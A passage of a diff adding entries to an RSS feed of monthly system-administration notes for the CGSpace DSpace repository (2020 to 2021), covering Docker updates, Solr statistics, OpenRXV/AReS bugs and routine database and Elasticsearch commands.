+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;ations-matching.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;1879
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ wc -l /tmp/2021-10-01-affiliations.txt 
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;7100 /tmp/2021-10-01-affiliations.txt
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
+&lt;li&gt;So we have 1879/7100 (26.46%) matching already&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-09/</link>
+      <pubDate>Wed, 01 Sep 2021 09:14:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-09/</guid>
+      <description>&lt;h2 id=&#34;2021-09-02&#34;&gt;2021-09-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Troubleshooting the missing Altmetric scores on AReS
+&lt;ul&gt;
+&lt;li&gt;Turns out that I didn&amp;rsquo;t actually fix them last month because the check for &lt;code&gt;content.altmetric&lt;/code&gt; still exists, and I can&amp;rsquo;t access the DOIs using &lt;code&gt;_h.source.DOI&lt;/code&gt; for some reason&lt;/li&gt;
+&lt;li&gt;I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!&lt;/li&gt;
+&lt;li&gt;I will change &lt;code&gt;DOI&lt;/code&gt; to &lt;code&gt;tomato&lt;/code&gt; in the repository setup and start a re-harvest&amp;hellip; I need to see if this is some kind of reserved word or something&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Even as &lt;code&gt;tomato&lt;/code&gt; I can&amp;rsquo;t access that field as &lt;code&gt;_h.source.tomato&lt;/code&gt; in Angular, but it does work as a filter source&amp;hellip; sigh&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;m having problems using the OpenRXV API
+&lt;ul&gt;
+&lt;li&gt;The syntax Moayad showed me last month doesn&amp;rsquo;t seem to honor the search query properly&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-08/</link>
+      <pubDate>Sun, 01 Aug 2021 09:01:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-08/</guid>
+      <description>&lt;h2 id=&#34;2021-08-01&#34;&gt;2021-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Update Docker images on AReS server (linode20) and reboot the server:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
+&lt;li&gt;I decided to upgrade linode20 from Ubuntu 18.04 to 20.04&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-07/</link>
+      <pubDate>Thu, 01 Jul 2021 08:53:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-07/</guid>
+      <description>&lt;h2 id=&#34;2021-07-01&#34;&gt;2021-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;COPY 20994
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-06/</link>
+      <pubDate>Tue, 01 Jun 2021 10:51:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-06/</guid>
+      <description>&lt;h2 id=&#34;2021-06-01&#34;&gt;2021-06-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;IWMI notified me that AReS was down with an HTTP 502 error
+&lt;ul&gt;
+&lt;li&gt;Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification&lt;/li&gt;
+&lt;li&gt;I don&amp;rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the &lt;code&gt;angular_nginx&lt;/code&gt; container isn&amp;rsquo;t running&lt;/li&gt;
+&lt;li&gt;I simply started it and AReS was running again:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-05/</link>
+      <pubDate>Sun, 02 May 2021 09:50:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-05/</guid>
+      <description>&lt;h2 id=&#34;2021-05-01&#34;&gt;2021-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents:
+&lt;ul&gt;
+&lt;li&gt;&amp;ldquo;RI/1.0&amp;rdquo;, 1337&lt;/li&gt;
+&lt;li&gt;&amp;ldquo;Microsoft Office Word 2014&amp;rdquo;, 941&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&amp;hellip; as that&amp;rsquo;s an actual user&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-04/</link>
+      <pubDate>Thu, 01 Apr 2021 09:50:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-04/</guid>
+      <description>&lt;h2 id=&#34;2021-04-01&#34;&gt;2021-04-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I wrote a script to query Sherpa&amp;rsquo;s API for our ISSNs: &lt;code&gt;sherpa-issn-lookup.py&lt;/code&gt;
+&lt;ul&gt;
+&lt;li&gt;I&amp;rsquo;m curious to see how the results compare with the results from Crossref yesterday&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;AReS Explorer was down since this morning, I didn&amp;rsquo;t see anything in the systemd journal
+&lt;ul&gt;
+&lt;li&gt;I simply took everything down with docker-compose and then back up, and then it was OK&lt;/li&gt;
+&lt;li&gt;Perhaps one of the containers crashed, I should have looked closer but I was in a hurry&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-03/</link>
+      <pubDate>Mon, 01 Mar 2021 10:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-03/</guid>
+      <description>&lt;h2 id=&#34;2021-03-01&#34;&gt;2021-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Discuss some OpenRXV issues with Abdullah from CodeObia
+&lt;ul&gt;
+&lt;li&gt;He&amp;rsquo;s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API&lt;/li&gt;
+&lt;li&gt;Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGSpace CG Core v2 Migration</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/</link>
+      <pubDate>Sun, 21 Feb 2021 13:27:35 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/</guid>
+      <description>&lt;p&gt;Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.&lt;/p&gt;
+&lt;p&gt;With reference to &lt;a href=&#34;https://agriculturalsemantics.github.io/cg-core/cgcore.html&#34;&gt;CG Core v2 draft standard&lt;/a&gt; by Marie-Angélique as well as &lt;a href=&#34;http://www.dublincore.org/specifications/dublin-core/dcmi-terms/&#34;&gt;DCMI DCTERMS&lt;/a&gt;.&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-02/</link>
+      <pubDate>Mon, 01 Feb 2021 10:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-02/</guid>
+      <description>&lt;h2 id=&#34;2021-02-01&#34;&gt;2021-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Abenet said that CIP found more duplicate records in their export from AReS
+&lt;ul&gt;
+&lt;li&gt;I re-opened &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/67&#34;&gt;the issue&lt;/a&gt; on OpenRXV where we had previously noticed this&lt;/li&gt;
+&lt;li&gt;The shared link where the duplicates are is here: &lt;a href=&#34;https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6&#34;&gt;https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I had a call with CodeObia to discuss the work on OpenRXV&lt;/li&gt;
+&lt;li&gt;Check the results of the AReS harvesting from last night:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;{
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  &amp;#34;count&amp;#34; : 100875,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  &amp;#34;_shards&amp;#34; : {
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;total&amp;#34; : 1,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;successful&amp;#34; : 1,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;skipped&amp;#34; : 0,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;failed&amp;#34; : 0
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  }
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-01/</link>
+      <pubDate>Sun, 03 Jan 2021 10:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-01/</guid>
+      <description>&lt;h2 id=&#34;2021-01-03&#34;&gt;2021-01-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter notified me that some filters on AReS were broken again
+&lt;ul&gt;
+&lt;li&gt;It&amp;rsquo;s the same issue with the field names getting &lt;code&gt;.keyword&lt;/code&gt; appended to the end that I already &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/66&#34;&gt;filed an issue on OpenRXV about last month&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;I fixed the broken filters (careful to not edit any others, lest they break too!)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV
+&lt;ul&gt;
+&lt;li&gt;The start page had been &amp;ldquo;1&amp;rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API&lt;/li&gt;
+&lt;li&gt;I adjusted it to default to 0 and added a note to the admin screen&lt;/li&gt;
+&lt;li&gt;I realized that this issue was actually causing the first page of 100 statistics to be missing&amp;hellip;&lt;/li&gt;
+&lt;li&gt;For example, &lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/66839&#34;&gt;this item&lt;/a&gt; has 51 views on CGSpace, but 0 on AReS&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-12/</link>
+      <pubDate>Tue, 01 Dec 2020 11:32:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-12/</guid>
+      <description>&lt;h2 id=&#34;2020-12-01&#34;&gt;2020-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Atmire responded about the issue with duplicate data in our Solr statistics
+&lt;ul&gt;
+&lt;li&gt;They noticed that some records in the statistics-2015 core haven&amp;rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&amp;rsquo;t migrated any of the records yet&lt;/li&gt;
+&lt;li&gt;That&amp;rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the &lt;code&gt;cua_version&lt;/code&gt; field&lt;/li&gt;
+&lt;li&gt;I started processing those (about 411,000 records):&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGSpace DSpace 6 Upgrade</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/</link>
+      <pubDate>Sun, 15 Nov 2020 13:27:35 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/</guid>
+      <description>&lt;p&gt;Notes about the DSpace 6 upgrade on CGSpace in 2020-11.&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-11/</link>
+      <pubDate>Sun, 01 Nov 2020 13:11:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-11/</guid>
+      <description>&lt;h2 id=&#34;2020-11-01&#34;&gt;2020-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test
+&lt;ul&gt;
+&lt;li&gt;So far we&amp;rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&amp;hellip; wow.&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-10/</link>
+      <pubDate>Tue, 06 Oct 2020 16:55:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-10/</guid>
+      <description>&lt;h2 id=&#34;2020-10-06&#34;&gt;2020-10-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add tests for the new &lt;code&gt;/items&lt;/code&gt; POST handlers to the DSpace 6.x branch of my &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api/tree/v6_x&#34;&gt;dspace-statistics-api&lt;/a&gt;
+&lt;ul&gt;
+&lt;li&gt;It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available&lt;/li&gt;
+&lt;li&gt;Tag and release version 1.3.0 on GitHub: &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0&#34;&gt;https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump
+&lt;ul&gt;
+&lt;li&gt;During the FlywayDB migration I got an error:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-09/</link>
+      <pubDate>Wed, 02 Sep 2020 15:35:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-09/</guid>
+      <description>&lt;h2 id=&#34;2020-09-02&#34;&gt;2020-09-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS&lt;/li&gt;
+&lt;li&gt;The AReS Explorer hasn&amp;rsquo;t updated its index since 2020-08-22 when I last forced it
+&lt;ul&gt;
+&lt;li&gt;I restarted it again now and told Moayad that the automatic indexing isn&amp;rsquo;t working&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Add &lt;code&gt;Alliance of Bioversity International and CIAT&lt;/code&gt; to affiliations on CGSpace&lt;/li&gt;
+&lt;li&gt;Abenet told me that the general search text on AReS doesn&amp;rsquo;t get reset when you use the &amp;ldquo;Reset Filters&amp;rdquo; button
+&lt;ul&gt;
+&lt;li&gt;I filed a bug on OpenRXV: &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/39&#34;&gt;https://github.com/ilri/OpenRXV/issues/39&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I filed an issue on OpenRXV to make some minor edits to the admin UI: &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/40&#34;&gt;https://github.com/ilri/OpenRXV/issues/40&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-08/</link>
+      <pubDate>Sun, 02 Aug 2020 15:35:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-08/</guid>
+      <description>&lt;h2 id=&#34;2020-08-02&#34;&gt;2020-08-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their &lt;code&gt;cg.coverage.country&lt;/code&gt; text values
+&lt;ul&gt;
+&lt;li&gt;It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&amp;rsquo;s preferred &amp;ldquo;display&amp;rdquo; country names)&lt;/li&gt;
+&lt;li&gt;It implements a &amp;ldquo;force&amp;rdquo; mode too that will clear existing country codes and re-tag everything&lt;/li&gt;
+&lt;li&gt;It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-07/</link>
+      <pubDate>Wed, 01 Jul 2020 10:53:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-07/</guid>
+      <description>&lt;h2 id=&#34;2020-07-01&#34;&gt;2020-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;A few users noticed that CGSpace wasn&amp;rsquo;t loading items today, item pages seem blank
+&lt;ul&gt;
+&lt;li&gt;I looked at the PostgreSQL locks but they don&amp;rsquo;t seem unusual&lt;/li&gt;
+&lt;li&gt;I guess this is the same &amp;ldquo;blank item page&amp;rdquo; issue that we had a few times in 2019 that we never solved&lt;/li&gt;
+&lt;li&gt;I restarted Tomcat and PostgreSQL and the issue was gone&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the &lt;code&gt;5_x-prod&lt;/code&gt; branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&amp;rsquo;s request&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-06/</link>
+      <pubDate>Mon, 01 Jun 2020 13:55:39 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-06/</guid>
+      <description>&lt;h2 id=&#34;2020-06-01&#34;&gt;2020-06-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I tried to run the &lt;code&gt;AtomicStatisticsUpdateCLI&lt;/code&gt; CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday
+&lt;ul&gt;
+&lt;li&gt;I sent Atmire the dspace.log from today and told them to log into the server to debug the process&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;In other news, I checked the statistics API on DSpace 6 and it&amp;rsquo;s working&lt;/li&gt;
+&lt;li&gt;I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-05/</link>
+      <pubDate>Sat, 02 May 2020 09:52:04 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-05/</guid>
+      <description>&lt;h2 id=&#34;2020-05-02&#34;&gt;2020-05-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter said that CTA is having problems submitting an item to CGSpace
+&lt;ul&gt;
+&lt;li&gt;Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &amp;lsquo;idle in transaction&amp;rsquo; and &amp;lsquo;waiting for lock&amp;rsquo; state are increasing again&lt;/li&gt;
+&lt;li&gt;I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-04/</link>
+      <pubDate>Thu, 02 Apr 2020 10:53:24 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-04/</guid>
+      <description>&lt;h2 id=&#34;2020-04-02&#34;&gt;2020-04-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Maria asked me to update Charles Staver&amp;rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it
+&lt;ul&gt;
+&lt;li&gt;I updated the fifty-eight existing items on CGSpace&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Looking into the items Udana had asked about last week that were missing Altmetric donuts:
+&lt;ul&gt;
+&lt;li&gt;&lt;a href=&#34;https://hdl.handle.net/10568/103225&#34;&gt;The first&lt;/a&gt; is still missing its DOI, so I added it and &lt;a href=&#34;https://twitter.com/mralanorth/status/1245632619661766657&#34;&gt;tweeted its handle&lt;/a&gt; (after a few hours there was a donut with score 222)&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://hdl.handle.net/10568/106899&#34;&gt;The second item&lt;/a&gt; now has a donut with score 2 since I &lt;a href=&#34;https://twitter.com/mralanorth/status/1243158045540134913&#34;&gt;tweeted its handle&lt;/a&gt; last week&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://hdl.handle.net/10568/107258&#34;&gt;The third item&lt;/a&gt; now has a donut with score 1 since I &lt;a href=&#34;https://twitter.com/mralanorth/status/1243158786392625153&#34;&gt;tweeted it&lt;/a&gt; last week&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;On the same note, the &lt;a href=&#34;https://hdl.handle.net/10568/106573&#34;&gt;one item&lt;/a&gt; Abenet pointed out last week now has a donut with score of 104 after I &lt;a href=&#34;https://twitter.com/mralanorth/status/1243163710241345536&#34;&gt;tweeted it&lt;/a&gt; last week&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-03/</link>
+      <pubDate>Mon, 02 Mar 2020 12:31:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-03/</guid>
+      <description>&lt;h2 id=&#34;2020-03-02&#34;&gt;2020-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Update &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api&#34;&gt;dspace-statistics-api&lt;/a&gt; for DSpace 6+ UUIDs
+&lt;ul&gt;
+&lt;li&gt;Tag version 1.2.0 on GitHub&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased &lt;a href=&#34;https://github.com/DSpace/DSpace/commit/184f2b2153479045fba6239342c63e7f8564b8b6#diff-0350ce2e13b28d5d61252b7a8f50a059&#34;&gt;SolrUpgradePre6xStatistics.java&lt;/a&gt;
+&lt;ul&gt;
+&lt;li&gt;You need to download this into the DSpace 6.x source and compile it&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-02/</link>
+      <pubDate>Sun, 02 Feb 2020 11:56:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-02/</guid>
+      <description>&lt;h2 id=&#34;2020-02-02&#34;&gt;2020-02-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Continue working on porting CGSpace&amp;rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday
+&lt;ul&gt;
+&lt;li&gt;Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database&lt;/li&gt;
+&lt;li&gt;I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks&lt;/li&gt;
+&lt;li&gt;Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff&lt;/li&gt;
+&lt;li&gt;The code finally builds and runs with a fresh install&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-01/</link>
+      <pubDate>Mon, 06 Jan 2020 10:48:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-01/</guid>
+      <description>&lt;h2 id=&#34;2020-01-06&#34;&gt;2020-01-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Open &lt;a href=&#34;https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706&#34;&gt;a ticket&lt;/a&gt; with Atmire to request a quote for the upgrade to DSpace 6&lt;/li&gt;
+&lt;li&gt;Last week Altmetric responded about the &lt;a href=&#34;https://hdl.handle.net/10568/97087&#34;&gt;item&lt;/a&gt; that had a lower score than than its DOI
+&lt;ul&gt;
+&lt;li&gt;The score is now linked to the DOI&lt;/li&gt;
